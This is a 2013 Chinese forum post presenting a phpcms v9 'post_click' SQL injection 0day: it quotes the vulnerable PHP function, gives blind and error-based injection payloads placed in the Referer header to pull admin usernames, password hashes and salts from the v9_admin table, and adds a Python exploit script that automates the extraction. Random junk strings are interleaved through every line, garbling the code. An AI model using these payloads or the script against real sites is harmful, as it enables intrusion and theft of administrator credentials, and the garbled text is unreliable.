找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2176|回复: 0
打印 上一主题 下一主题

phpcms post_click注入0day利用代码

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:01:00 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:- s' p! s- G, ~& A
( T. u. s" ^4 l& Y: N2 D7 W- ^) X
问题函数\phpcms\modules\poster\index.php6 @0 j. Y  |. M/ n7 S
7 v/ C+ g; F+ d
public function poster_click() {7 R  _  Q. [; j+ j
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
7 U" E7 `" G8 {% c: ]% ~$r = $this->db->get_one(array('id'=>$id));3 w% `& B+ b  L. i
if (!is_array($r) && empty($r)) return false;
( L% i9 P" i3 V; C, Y6 @. d$ip_area = pc_base::load_sys_class('ip_area');( e- b0 d) u/ q( j' f( E7 R
$ip = ip();5 C7 ?8 _( h. D3 M& @$ Y% \) a
$area = $ip_area->get($ip);+ }( E9 J" s( H' N2 K
$username = param::get_cookie('username') ? param::get_cookie('username') : '';
* E* T; O: ~$ U/ gif($id) {) p( ?5 k& n) s# `( a8 H
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();+ Q% ^0 ?+ ]" d- p" N5 d- G* D) u
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));0 M- ~4 |) K0 L- X) a# `5 X
}! _# N" l' A% F8 `
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
7 R) B' E0 G4 g, ~6 \$setting = string2array($r['setting']);
0 ]7 r0 d4 L! i$ o, e% T; A4 Eif (count($setting)==1) {5 p+ N' X# U1 h* U6 l. y
$url = $setting['1']['linkurl'];* A( w  y3 p+ X3 j( O7 r$ }
} else {. c' t: J9 `1 D: d1 ~7 _, S
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];/ t/ p7 [. z* y: U' a/ A. e7 t: N
}, M9 K, B, e8 o) z
header('Location: '.$url);$ y8 H7 B; G. }# z
}
! L' I+ U; b" y
7 J( l( r: I, h! V9 k3 a 1 X+ C; G& D  @2 S" K* W3 V* y
7 |" D) l4 O0 ?! n7 [7 a
利用方式:8 D# l4 x6 g$ V9 R* x$ E

/ k! g( j$ G, u6 t1、可以采用盲注入的手法:
( }" J2 J4 Z' E4 m2 {6 D  N& K
( ]$ H1 I; F, A9 s+ Ireferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#  T2 u# f3 }# E  j- U5 y( V* M
, M& _, `( j( A" Q; U
通过返回页面,正常与否一个个猜解密码字段。) l+ h/ K: H& F2 {# K. l! p
) V: b3 E, O( ?0 `4 ~  G
2、代码是花开写的,随手附上了:
/ Y, a! e+ Z$ K& E- n) s2 q
; D( T' l* ^# E/ E! m& [: U. J1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#: w8 }) B( D* i; K8 \" E

5 D5 h% W* `+ v此方法是爆错注入手法,原理自查。- ]: i. s" G2 \* p

5 W; m2 u# A2 C! k6 t) Q, C6 Y , \3 h4 x+ J+ {  z
- z2 |9 a: n! _3 L9 s% {7 Y
利用程序:: d  N  T( N9 K
9 O# h2 x9 R4 F8 e
#!/usr/bin/env python
  ~5 p2 y! R) F5 r* w+ jimport httplib,sys,re
  O7 I  v* H: x9 N
  H+ c3 e' `% m; y% T" E, ^5 odef attack():
# q8 x6 ^. U, a5 b: Dprint “Code by Pax.Mac Team conqu3r!”
9 k2 z: |6 k5 |- y  g, cprint “Welcome to our zone!!!”5 v4 e: L! |3 ]- F
url=sys.argv[1]
# ^! F- P0 B* V; l1 |5 qpaths=sys.argv[2]  ^  _0 w# \) w5 _. v* G
conn = httplib.HTTPConnection(url)% A8 I# T4 w! }+ R# g9 B: r
i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,# m% J) A# U& a  O3 A+ S, U( q0 p0 e
“Accept”: “text/plain”,2 {( P! Z& |- _/ t+ {' _
“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
% T( B6 q' d1 J7 N& G' b9 Vconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers), B$ W2 x5 @# Y6 R, ^
r1 = conn.getresponse()
9 m* C) w' M9 \3 jdatas=r1.read()
7 P* g7 Y  [3 ?0 c& z3 Edatas=re.findall(r”Duplicate entry \’\w+’”, datas)0 C0 I+ X  w; q" a! }
print datas[0]
1 _' X3 z. Z6 m' t# X/ f' Q  J$ ^conn.close()
7 K4 v5 R3 i' O$ [if __name__==”__main__”:4 c( R% d2 e# U2 n, d
if len(sys.argv)<3:7 i8 H3 |: f. O* p1 `
print “Code by Pax.Mac Team conqu3r”
' m  q  c( T6 B3 \' T8 s0 sprint “Usgae:”# G. X) `2 ]# O: o6 J' m
print “    phpcmsattack.py   www.paxmac.org /”- }$ l- t7 W7 Q
print “    phpcmsataack.py   www.paxmac.org /phpcmsv9/”
3 e/ W& Q* N- @sys.exit(1)6 C7 J& h5 P1 a! f
attack()
, T+ c; V. |& d) F9 g" i3 d! r& M# \1 ~3 K
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表